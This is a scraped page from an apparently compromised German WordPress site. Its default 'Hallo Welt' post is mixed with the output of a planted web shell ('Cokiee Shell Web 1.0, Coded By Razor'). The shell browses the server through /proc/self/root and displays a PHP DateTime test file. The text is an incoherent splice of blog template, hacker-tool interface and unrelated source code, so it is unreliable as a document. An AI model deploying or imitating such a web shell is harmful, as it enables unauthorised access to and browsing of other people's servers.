Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/date/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/date/tests/bug68078_negative.phpt |
--TEST-- Comparing datetime objects with negative timestamps should account for microseconds --FILE-- <?php date_default_timezone_set('UTC'); $earlyDate1 = DateTime::createFromFormat('U.u', '1.8642')->modify('-5 seconds'); $earlyDate2 = DateTime::createFromFormat('U.u', '1.2768')->modify('-5 seconds'); $earlyDate3 = DateTime::createFromFormat('U.u', '1.2768')->modify('-5 seconds'); // var_dump($earlyDate1, $earlyDate2, $earlyDate3); var_dump($earlyDate1 == $earlyDate2); var_dump($earlyDate1 > $earlyDate2); var_dump($earlyDate2 < $earlyDate1); var_dump($earlyDate2 == $earlyDate3); --EXPECT-- bool(false) bool(true) bool(true) bool(true)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare